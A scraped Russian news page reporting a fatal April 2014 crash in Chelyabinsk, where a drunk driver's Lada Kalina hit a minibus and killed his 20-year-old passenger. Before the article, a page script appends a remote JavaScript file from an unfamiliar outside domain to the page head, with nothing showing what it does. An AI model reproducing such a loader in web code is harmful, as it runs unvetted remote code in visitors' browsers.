, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Челябинске пьяный водитель «Калины» угробил пассажира в столкновении с маршруткой

В четверг, 3 апреля, в Советском районе Челябинска произошла авария с участием автомобиля "Лада Калина" и маршрутным такси марки ПАЗ. В результате ДТП пассажир отечественного авто погиб на месте, пострадавших из числа пассажиров маршрутки нет.

Смертельная авария произошла вечером, ориентировочно в 21:20 в районе дома №2 по улице Дарвина. Водитель "Калины", находясь на рулем в состоянии алкогольного опьянения, выехал на полосу встречного движения и на всем ходу столкнулся с маршрутным "Пазиком". В результате пассажир легкового автомобиля, 20-летний юноша, погиб на месте происшествия. Водитель "Лады" госпитализирован, никто из семи пассажиров маршрутного такси не пострадал.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
3:44 - 04 апреля 2014
|
автор: U-RSS
|
(492)
|
(0)

Комментарии (0)

Я человек
Я бот